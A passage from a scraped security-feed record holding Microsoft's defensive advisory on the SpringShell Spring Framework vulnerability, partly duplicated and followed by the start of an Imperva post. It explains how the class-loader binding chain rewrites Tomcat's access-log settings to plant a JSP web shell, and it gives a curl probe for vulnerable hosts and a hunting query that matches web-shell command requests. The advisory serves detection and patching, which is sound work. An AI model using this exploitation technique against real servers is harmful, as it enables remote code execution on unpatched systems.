modify the above rules in response to emerging attack patterns as required. \n\nFor more information about Managed Rules and Default Rule Set (DRS) on Azure Front Door, see the [Web Application Firewall DRS rule groups and rules documentation](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). For more information about Managed Rules and OWASP Core Rule Set (CRS) on Azure Application Gateway, see the [Web Application Firewall CRS rule groups and rules documentation](<https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules?tabs=owasp32>)\n\n### Patch information and workarounds\n\nCustomers are encouraged to apply these mitigations to reduce the impact of this threat. Check the recommendations card in Microsoft 365 Defender threat and vulnerability management for the deployment status of monitored mitigations.\n\n * An [update](<https://spring.io/blog/2022/03/31/spring-boot-2-6-6-available-now>) is available for CVE-2022-22965. Administrators should upgrade to versions 5.3.18 or later or 5.2.19 or later. If the patch is applied, no other mitigation is necessary.\n\nIf you\u2019re unable to patch CVE-2022-22965, you can implement this set of workarounds published by [Spring](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>):\n\n * Search the @InitBinder annotation globally in the application to see if the dataBinder.setDisallowedFields method is called in the method body. If the introduction of this code snippet is found, add `{\"class.*\",\"Class.*\",\"*.class.*\", \"*.Class.*\"}` to the original blacklist. (**Note:** If this code snippet is used a lot, it needs to be appended in each location.)\n * Add the following global class into the package where the Controller is located. Then recompile and test the project for functionality:\n \n \n import org.springframework.core.annotation.Order;\n import org.springframework.web.bind.WebDataBinder;\n import org.springframework.web.bind.annotation.ControllerAdvice;\n import org.springframework.web.bind.annotation.InitBinder;\n @ControllerAdvice\n @Order(10000)\n public class GlobalControllerAdvice{\n @InitBinder\n public void setAllowedFields(webdataBinder dataBinder){\n String[]abd=new string[]{\"class.*\",\"Class.*\",\"*.class.*\",\"*.Class.*\"};\n dataBinder.setDisallowedFields(abd);\n }\n }\n\n## Detections\n\n### Microsoft 365 Defender\n\n#### Endpoint detection and response (EDR)\n\nAlerts with the following title in the security center can indicate threat activity on your network:\n\n * Possible SpringShell exploitation\n\nThe following alerts for an observed attack, but might not be unique to exploitation for this vulnerability:\n\n * Suspicious process executed by a network service\n\n#### Antivirus\n\nMicrosoft Defender antivirus version **1.361.1234.0** or later detects components and behaviors related to this threat with the following detections:\n\n * Trojan:Python/SpringShellExpl\n * Exploit:Python/SpringShell\n * Backdoor:PHP/Remoteshell.V\n\n### Hunting\n\n#### Microsoft 365 Defender advanced hunting queries \n\nUse the query below to surface exploitation of CVE-2022-22965 on both victim devices and devices performing the exploitation. Note that this query only covers HTTP use of the exploitation and not HTTPS.\n \n \n DeviceNetworkEvents\n | where Timestamp > ago(7d)\n | where ActionType =~ \"NetworkSignatureInspected\"\n | where AdditionalFields contains \".jsp?cmd=\"\n | summarize makeset(AdditionalFields, 5), min(Timestamp), max(Timestamp) by DeviceId, DeviceName \n\n#### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the following queries to look for this threat activity:\n\n * [Possible SpringShell exploitation attempt (CVE-2022-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringShellExploitationAttempt.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible SpringShell exploitation attempt (CVE-2022-22965) to drop a malicious web shell in a location accessible by HTTP requests. Attackers then make requests to the malicious backdoor to run system commands.\n * [Possible web shell usage attempt related to SpringShell (CVE-2202-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringshellWebshellUsage.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible web shell usage related to SpringShell RCE vulnerability (CVE-2022-22965).\n * [AV detections related to SpringShell Vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityAlert/AVSpringShell.yaml>) \u2013 This query looks for Microsoft Defender for Endpoint hits related to the SpringShell vulnerability. In Microsoft Sentinel, the _SecurityAlerts _table includes only the device name of the affected device. This query joins the _DeviceInfo _table to clearly connect other information such as device group, IP address, signed in users, and others. This allows the Microsoft Sentinel analyst to have more context related to the alert, if available.\n\n**Revision history**\n\n_[04/11/2022] \u2013 _Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)._ _See _Detection and Mitigation section for details_.\n\n_[04/08/2022] \u2013 Azure Web Application Firewall (WAF) customers with Azure Front Door now has enhanced protection for Spring4Shell exploits - CVE-2022-22963, CVE-2022-22965, and CVE-2022-22947. See Detection and Mitigation section for details. \n[04/05/2022] \u2013 We added Microsoft Sentinel hunting queries to look for SpringShell exploitation activity._\n\nThe post [SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965](<https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-05T01:11:24", "type": "mmpc", "title": "SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965", "CVE-2202-22965"], "modified": "2022-04-05T01:11:24", "id": "MMPC:07417E2EE012BAE0350B156AD2AE30B3", "href": "https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mssecure": [{"lastseen": "2022-04-11T23:40:23", "description": "**_April 11, 2022 update_** \u2013 __Azure Web Application Firewall (WAF) customers with Regional WAF with Azure Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)._ _See [](<https://www.microsoft.com/security/blog/wp-admin/post.php?post=110715&action=edit#detectandprotect>)Detect and protect with Azure Web Application Firewall (Azure WAF) section for details__.\n\nOn March 31, 2022, vulnerabilities in the Spring Framework for Java were [publicly disclosed](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>). Microsoft is currently assessing the impact associated with these vulnerabilities. This blog is for customers looking for protection against exploitation and ways to detect vulnerable installations on their network of the critical remote code execution (RCE) vulnerability [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>) (also known as SpringShell or Spring4Shell).\n\nThe Spring Framework is the most widely used lightweight open-source framework for Java. In Java Development Kit (JDK) version 9.0 or later, a remote attacker can obtain an _AccessLogValve _object through the framework\u2019s parameter binding feature and use malicious field values to trigger the pipeline mechanism and write to a file in an arbitrary path, if certain conditions are met. \n\nThe vulnerability in Spring Core\u2014referred to in the security community as SpringShell or Spring4Shell\u2014can be exploited when an attacker sends a specially crafted query to a web server running the Spring Core framework. Other vulnerabilities disclosed in the same component are less critical and not tracked as part of this blog.\n\nImpacted systems have the following traits:\n\n * Running JDK 9.0 or later\n * Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and earlier versions\n * Apache Tomcat as the Servlet container:\n * Packaged as a traditional Java web archive (WAR) and deployed in a standalone Tomcat instance; typical Spring Boot deployments using an embedded Servlet container or reactive web server are not impacted\n * Tomcat has _spring-webmvc_ or _spring-webflux_ dependencies\n\nAny system using JDK 9.0 or later and using the Spring Framework or derivative frameworks should be considered vulnerable. The following nonmalicious command can be used to determine vulnerable systems:\n \n \n $ curl host:port/path?class.module.classLoader.URLs%5B0%5D=0\n\nA host that returns an HTTP 400 response should be considered vulnerable to the attack detailed in the proof of concept (POC) below. Note that while this test is a good indicator of a system\u2019s susceptibility to an attack, any system within the scope of impacted systems listed above should still be considered vulnerable.\n\nThe [](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)[threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) console within [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) provides detection and reporting for this vulnerability.\n\nThis blog covers the following topics:\n\n 1. Observed activity\n 2. Attack breakdown\n 3. The vulnerability and exploit in depth\n * Background\n * Request mapping and request parameter binding\n * The process of property binding\n * The vulnerability and its exploitation\n * Prelude: CVE-2010-1622\n * The current exploit: CVE-2022-22965\n * From ClassLoader to AccessLogValve\n 4. Discovery and mitigations\n * How to find vulnerable devices\n * Enhanced protection with Azure Firewall Premium\n * Detect and protect with Azure Web Application Firewall (Azure WAF)\n * Global WAF with Azure Front Door\n * Regional WAF with Azure Application Gateway\n * Patch information and workarounds\n 5. Detections\n * Microsoft 365 Defender\n * Endpoint detection and response (EDR)\n * Antivirus\n * Hunting\n * Microsoft 365 Defender advanced hunting queries \n * Microsoft Sentinel\n\n## Observed activity\n\nMicrosoft regularly monitors attacks against our cloud infrastructure and services to defend them better. Since the Spring Core vulnerability was announced, we have been tracking a low volume of exploit attempts across our cloud services for Spring Cloud and Spring Core vulnerabilities. For CVE-2022-22965, the attempts closely align with the basic web shell POC described in this post.\n\nMicrosoft\u2019s continued monitoring of the threat landscape has not indicated a significant increase in quantity of attacks or new campaigns at this time.\n\n## Attack breakdown\n\nCVE-2022-22965 affects functions that use request mapping annotation and Plain Old Java Object (POJO) parameters within the Spring Framework. The POC code creates a controller that, when loaded into Tomcat, handles HTTP requests. \n\nThe only publicly available working POC is specific to Tomcat server's logging properties via the _ClassLoader_ module in the _propertyDescriptor_ cache. The attacker can update the _AccessLogValve_ class using the module to create a web shell in the Tomcat root directory called _shell.jsp_. The attacker can then change the default access logs to a file of their choosing.\n\nFigure 1. Screenshot from the original POC code post\n\nThe changes to _AccessValveLog_ can be achieved by an attacker who can use HTTP requests to create a _.jsp_ file in the service\u2019s root directory. In the example below, each GET parameter is set as a Java object property. Each GET request then executes a Java code resembling the example below, wherein the final segment \u201csetPattern\u201d would be unique for each call (such as setPattern, setSuffix, setDirectory, and others): \n\n Figure 2. Screenshot from the original POC code post Figure 3. Screenshot from the original POC code post\n\nThe _.jsp_ file now contains a payload with a password-protected web shell with the following format:\n\n\n\nThe attacker can then use HTTP requests to execute commands. While the above POC depicts a command shell as the inserted code, this attack could be performed using any executable code.\n\n## The vulnerability and exploit in depth\n\nThe vulnerability in Spring results in a client's ability, in some cases, to modify sensitive internal variables inside the web server or application by carefully crafting the HTTP request.\n\nIn the case of the Tomcat web server, the vulnerability allowed for that manipulation of the access log to be placed in an arbitrary path with somewhat arbitrary contents. The POC above sets the contents to be a JSP web shell and the path inside the Tomcat's web application ROOT directory, which essentially drops a reverse shell inside Tomcat. For the web application to be vulnerable, it needs to use Spring\u2019s request mapping feature, with the handler function receiving a Java object as a parameter.\n\n### Background\n\n#### Request mapping and request parameter binding\n\nSpring allows developers to map HTTP requests to Java handler methods. The web application's developer can ask Spring to call an appropriate handler method each time a user requests a specific URI. For instance, the following web application code will cause Spring to invoke the method _handleWeatherRequest_ each time a user requests the URI _/WeatherReport_:\n \n \n @RequestMapping(\"/WeatherReport\")\n public string handleWeatherRequest(Location reportLocation)\n {\n \u2026\n }\n\nMoreover, through request parameter binding, the handler method can accept arguments passed through parameters in GET/POST/REST requests. In the above example, Spring will instantiate a _Location_ object, initialize its fields according to the HTTP request\u2019s parameters, and pass it on to _handleWeatherRequest_. So, if, for instance, _Location_ will be defined as:\n \n \n class Location \n { \n public void setCountry(string country) {\u2026} \n public void setCity(string city) {\u2026} \n public string getCountry() {\u2026} \n public string getCity() {\u2026} \n }\n\nIf we issue the following HTTP request:\n \n \n example.com/WeatherReport?country=USA&city=Redmond\n\nThe resulting call to _handleWeatherRequest_ will automatically have a _reportLocation_ argument with the country set to USA and city set to Redmond. \n\nIf _Location_ had a sub-object named _coordinates_, which contained _longitude_ and _latitude_ parameters, then Spring would try and initialize them out of the parameters of an incoming request. For example, when receiving a request with GET params _coordinates.longitude=123&coordinate.latitude=456_ Spring would try and set those values in the _coordinates_ member of _location_, before handing over control to _handleWeatherRequest_.\n\nThe SpringShell vulnerability directly relates to the process Spring uses to populate these fields.\n\n#### The process of property binding\n\nWhenever Spring receives an HTTP request mapped to a handler method as described above, it will try and bind the request\u2019s parameters for each argument in the handler method. Now, to stick with the previous example, a client asked for:\n \n \n example.com/WeatherReport?x.y.z=foo\n\nSpring would instantiate the argument (in our case, create a _Location_ object). Then it breaks up the parameter name by dots (.) and tries to do a series of steps:\n\n 1. Use Java introspection to map all accessors and mutators in _location_\n 2. If location has a getX_()_ accessor, call it to get the _x_ member of location\n 3. Use Java introspection to map all accessors and mutators in the_ x_ object\n 4. If the _x_ object has a _getY_() accessor, call it to get the _y_ object inside of the _x_ object\n 5. Use Java introspection to map all accessors and mutators in the_ y_ object\n 6. If the _y_ object has a _setZ()_ mutator, call it with parameter _\u201cfoo\u201d_\n\nSo essentially, ignoring the details, we get _location.getX().getY().setZ(\u201cfoo\u201d)_.\n\n### The vulnerability and its exploitation\n\n#### Prelude: CVE-2010-1622\n\nIn June 2010, a CVE was [published](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>) for the Spring framework. The crux of the CVE was as follows:\n\n 1. All Java objects implicitly contain a _getClass()_ accessor that returns the _Class_ describing the object's class.\n 2. _Class_ objects have a _getClassLoader()_ accessor the gets the _ClassLoader_ object.\n 3. Tomcat uses its own class loader for its web applications. This class loader contains various members that can affect Tomcat\u2019s behavior. One such member is _URLs_, which is an array of URLs the class loader uses to retrieve resources.\n 4. Overwriting one of the URLs with a URL to a remote JAR file would cause Tomcat to subsequently load the JAR from an attacker-controlled location.\n\nThe bug was fixed in Spring by preventing the mapping of the _getClassLoader()_ or _getProtectionDomain()_ accessors of _Class_ objects during the property-binding phase. Hence _class.classLoader_ would not resolve, thwarting the attack.\n\n#### The current exploit: CVE-2022-22965\n\nThe current exploit leverages the same mechanism as in CVE-2010-1622, bypassing the previous bug fix. Java 9 added a new technology called Java Modules. An accessor was added to the _Class_ object, called _getModule()_. The _Module_ object contains a _getClassLoader()_ accessor. Since the CVE-2010-1622 fix only prevented mapping the _getClassLoader()_ accessor of _Class_ objects, Spring mapped the _getClassLoader()_ accessor of the _Module_ object. Once again, one could reference the class loader from Spring via the _class.module.classLoader_ parameter name prefix.\n\n#### From _ClassLoader_ to _AccessLogValve_\n\nThe latest exploit uses the same accessor chaining, via the Tomcat class loader, to drop a JSP web shell on the server.\n\nThis is done by manipulating the properties of the _AccessLogValve_ object in Tomcat\u2019s pipeline. The _AccessLogValve _is referenced using the _class.module.classLoader.resources.context.parent.pipeline.first_ parameter prefix.\n\nThe following properties are changed:\n\n 1. **Directory: **The path where to store the access log, relative to Tomcat\u2019s root directory. This can be manipulated to point into a location accessible by http requests, such as the web application\u2019s directory.\n 2. **Prefix: **The prefix of the access log file name\n 3. **Suffix: **The suffix of the access log file name. The log file name is a concatenation of the prefix with the suffix.\n 4. **Pattern: **A string that describes the log record structure. This can be manipulated so that each record will essentially contain a JSP web shell.\n 5. **FileDateFormat:** Setting this causes the new access log settings to take effect.\n\nOnce the web shell is dropped on the server, the attacker can execute commands on the server as Tomcat.\n\n## Discovery and mitigations\n\n### How to find vulnerable devices\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/threat-protection/endpoint-defender>) monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities. \n\nCustomers can now search for CVE-2022-22965 to find vulnerable devices through the [Weaknesses](<https://securitycenter.microsoft.com/vulnerabilities?search=CVE-2022-22965>) page in threat and vulnerability management.\n\nFigure 4. Weaknesses page in Microsoft Defender for Endpoint\n\n### Enhanced protection with Azure Firewall Premium\n\nCustomers using [Azure Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-migrate>) have enhanced protection from the SpringShell CVE-2022-22965 vulnerability and exploits. Azure Firewall Premium Intrusion Detection and Prevention System (IDPS) provides IDPS inspection for all east-west traffic, outbound traffic to the internet, and inbound HTTP traffic from the internet. The vulnerability rulesets are continuously updated and include vulnerability protection for SpringShell since March 31, 2022. The screenshot below shows all the scenarios which are actively mitigated by Azure Firewall Premium.\n\nConfigure Azure Firewall Premium with both IDPS Alert & Deny mode and TLS inspection enabled for proactive protection against CVE-2022-22965 exploit. \n\nFigure 5. Azure Firewall Premium portal detecting CVE-2022-22965 exploitation attempts.\n\nCustomers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/azure/firewall/premium-migrate>). Customers new to Azure Firewall Premium can learn more about [Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-features>).\n\n### Detect and protect with Azure Web Application Firewall (Azure WAF)\n\nAzure Web Application Firewall (WAF) customers with Azure Front Door and Azure Application Gateway deployments now have enhanced protection for the SpringShell exploit - [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and other high impact Spring vulnerabilities [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>) and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>). To help detect and mitigate these critical Spring vulnerabilities, we have released four new rules.\n\n#### Global WAF with Azure Front Door\n\nAzure WAF has updated Default Rule Set (DRS) versions 2.0/1.1/1.0.\n\n * Rule group: _MS-ThreatIntel-WebShells_, Rule Id: 99005006 - Spring4Shell Interaction Attempt\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001014 - Attempted Spring Cloud routing-expression injection (CVE-2022-22963)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001015 - Attempted Spring Framework unsafe class object exploitation (CVE-2022-22965)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001016 - Attempted Spring Cloud Gateway Actuator injection (CVE-2022-22947)\n\nWAF rules on Azure Front Door are disabled by default on existing Microsoft managed rule sets.\n\nFigure 6. Screenshot of WAF Spring vulnerabilities\n\n#### Regional WAF with Azure Application Gateway\n\nAzure WAF has updated OWASP Core Rule Set (CRS) versions for Azure Application Gateway WAF V2 regional deployments. New rules are under _Known_CVEs_ rule group:\n\n * Rule Id: 800110 - _Spring4Shell Interaction Attempt_\n * Rule Id: 800111 - _Attempted Spring Cloud routing-expression injection_ - CVE-2022-22963\n * Rule Id: 800112 - _Attempted Spring Framework unsafe class object exploitation_ - CVE-2022-22965\n * Rule Id: 800113 - _Attempted Spring Cloud Gateway Actuator injection_ - CVE-2022-22947\n\nWAF rules on Azure Application Gateway are _enabled_ by default for supported CRS versions.\n\nFigure 7. Spring vulnerability rules for Azure Application Gateway OWASP Core Rule Set (CRS)\n\n**Recommendation**: Enable WAF SpringShell rules to get protection from these threats. We will continue to monitor threat patterns and modify the above rules in response to emerging attack patterns as required. \n\nFor more information about Managed Rules and Default Rule Set (DRS) on Azure Front Door, see the [Web Application Firewall DRS rule groups and rules documentation](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). For more information about Managed Rules and OWASP Core Rule Set (CRS) on Azure Application Gateway, see the [Web Application Firewall CRS rule groups and rules documentation](<https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules?tabs=owasp32>)\n\n### Patch information and workarounds\n\nCustomers are encouraged to apply these mitigations to reduce the impact of this threat. Check the recommendations card in Microsoft 365 Defender threat and vulnerability management for the deployment status of monitored mitigations.\n\n * An [update](<https://spring.io/blog/2022/03/31/spring-boot-2-6-6-available-now>) is available for CVE-2022-22965. Administrators should upgrade to versions 5.3.18 or later or 5.2.19 or later. If the patch is applied, no other mitigation is necessary.\n\nIf you\u2019re unable to patch CVE-2022-22965, you can implement this set of workarounds published by [Spring](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>):\n\n * Search the @InitBinder annotation globally in the application to see if the dataBinder.setDisallowedFields method is called in the method body. If the introduction of this code snippet is found, add `{\"class.*\",\"Class.*\",\"*.class.*\", \"*.Class.*\"}` to the original blacklist. (**Note:** If this code snippet is used a lot, it needs to be appended in each location.)\n * Add the following global class into the package where the Controller is located. Then recompile and test the project for functionality:\n \n \n import org.springframework.core.annotation.Order;\n import org.springframework.web.bind.WebDataBinder;\n import org.springframework.web.bind.annotation.ControllerAdvice;\n import org.springframework.web.bind.annotation.InitBinder;\n @ControllerAdvice\n @Order(10000)\n public class GlobalControllerAdvice{\n @InitBinder\n public void setAllowedFields(webdataBinder dataBinder){\n String[]abd=new string[]{\"class.*\",\"Class.*\",\"*.class.*\",\"*.Class.*\"};\n dataBinder.setDisallowedFields(abd);\n }\n }\n\n## Detections\n\n### Microsoft 365 Defender\n\n#### Endpoint detection and response (EDR)\n\nAlerts with the following title in the security center can indicate threat activity on your network:\n\n * Possible SpringShell exploitation\n\nThe following alerts for an observed attack, but might not be unique to exploitation for this vulnerability:\n\n * Suspicious process executed by a network service\n\n#### Antivirus\n\nMicrosoft Defender antivirus version **1.361.1234.0** or later detects components and behaviors related to this threat with the following detections:\n\n * Trojan:Python/SpringShellExpl\n * Exploit:Python/SpringShell\n * Backdoor:PHP/Remoteshell.V\n\n### Hunting\n\n#### Microsoft 365 Defender advanced hunting queries \n\nUse the query below to surface exploitation of CVE-2022-22965 on both victim devices and devices performing the exploitation. Note that this query only covers HTTP use of the exploitation and not HTTPS.\n \n \n DeviceNetworkEvents\n | where Timestamp > ago(7d)\n | where ActionType =~ \"NetworkSignatureInspected\"\n | where AdditionalFields contains \".jsp?cmd=\"\n | summarize makeset(AdditionalFields, 5), min(Timestamp), max(Timestamp) by DeviceId, DeviceName \n\n#### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the following queries to look for this threat activity:\n\n * [Possible SpringShell exploitation attempt (CVE-2022-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringShellExploitationAttempt.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible SpringShell exploitation attempt (CVE-2022-22965) to drop a malicious web shell in a location accessible by HTTP requests. Attackers then make requests to the malicious backdoor to run system commands.\n * [Possible web shell usage attempt related to SpringShell (CVE-2202-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringshellWebshellUsage.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible web shell usage related to SpringShell RCE vulnerability (CVE-2022-22965).\n * [AV detections related to SpringShell Vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityAlert/AVSpringShell.yaml>) \u2013 This query looks for Microsoft Defender for Endpoint hits related to the SpringShell vulnerability. In Microsoft Sentinel, the _SecurityAlerts _table includes only the device name of the affected device. This query joins the _DeviceInfo _table to clearly connect other information such as device group, IP address, signed in users, and others. This allows the Microsoft Sentinel analyst to have more context related to the alert, if available.\n\n**Revision history**\n\n_[04/11/2022] \u2013 _Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)._ _See _Detection and Mitigation section for details_.\n\n_[04/08/2022] \u2013 Azure Web Application Firewall (WAF) customers with Azure Front Door now has enhanced protection for Spring4Shell exploits - CVE-2022-22963, CVE-2022-22965, and CVE-2022-22947. See Detection and Mitigation section for details. \n[04/05/2022] \u2013 We added Microsoft Sentinel hunting queries to look for SpringShell exploitation activity._\n\nThe post [SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965](<https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-05T01:11:24", "type": "mssecure", "title": "SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965", "CVE-2202-22965"], "modified": "2022-04-05T01:11:24", "id": "MSSECURE:07417E2EE012BAE0350B156AD2AE30B3", "href": "https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2022-03-31T18:03:34", "description": "New zero-day Remote Code Execution (RCE) vulnerabilities were discovered in Spring Framework, an application development framework and inversion of control container for the Java platform. The vulnerability potentially leaves millions of applications at risk of compromise. In two separate disclosures, [zero-day](<https://www.imperva.com/learn/application-security/zero-day-exploit/>) RCE vulnerabilities were revealed in the Cloud and Core modules of Spring Framework.\n\nSpring Framework \u201cprovides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform\u201d [[1](<https://spring.io/projects/spring-framework>)]. Java is one of the most commonly used development languages, and Spring is commonly cited as one of the most popular Java frameworks.\n\nThe first of the disclosures [dropped](<https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html>) on March 26, and reported on a vulnerability in the Spring Framework Cloud module, which allowed for the injection of a SPeL expression into a header value. This crafted header value would then be evaluated by the server and could result in a RCE. The vulnerability was assigned [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>).\n\nThe second of these disclosures was released on March 29 on Twitter by a researcher, in a since-deleted Tweet, containing a screenshot of the exploit request. Since then, the exploit was tweeted by others and published to GitHub, but again, was quickly removed. The vulnerability, called Spring Framework RCE via Data Binding on JDK 9+, comes in the form of a Java class injection flaw in Spring Core, where the JDK version is >=9.0. If exploited, an attacker can leverage this vulnerability to perform a RCE on the server. This vulnerability was assigned [CVE-2022-22965](<https://tanzu.vmware.com/security/CVE-2022-22965>).\n\nSince the disclosures, Imperva Threat Research monitored widespread attempted exploitations of _both_ new zero-day vulnerabilities (~5.5 million and counting as of March 31).\n\n## Imperva Delivers Protection from CVE-2022-22963\n\nImperva Threat Research analysts downloaded and quickly tested the exploit, verifying that both vulnerabilities are blocked out of the box by [Imperva Cloud Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) (WAF) and Imperva WAF Gateway.\n\nGiven the nature of how [Imperva Runtime Protection (RASP)](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) works, RCEs caused by CVE-2022-22963 and Spring4Shell are stopped without requiring any code changes or policy updates. If Imperva RASP is currently deployed, applications of all kinds (active, legacy, third-party, APIs, etc.) are protected.\n\nTogether, Imperva WAF and Imperva RASP provide defense-in-depth for protecting applications and APIs. Both are industry-leading products that are designed to protect against zero day threats and the OWASP Top 10 application security threats, injections and weaknesses. If you\u2019re looking for protection from CVE-2022-22963, please contact us.\n\n**Q: How can I verify that Spring Framework RCE via Data Binding on JDK 9+ (Spring4Shell) is being blocked?**\n\n**A:** For CWAF customers, Imperva provides attack analytics, which shows customers any attempts to exploit CVE-2022-22963. In addition, existing rules for older vulnerabilities including CVE-2015-1427 protect against CVE-2022-22965.\n\nFor WAF Gateway customers, Imperva has signatures 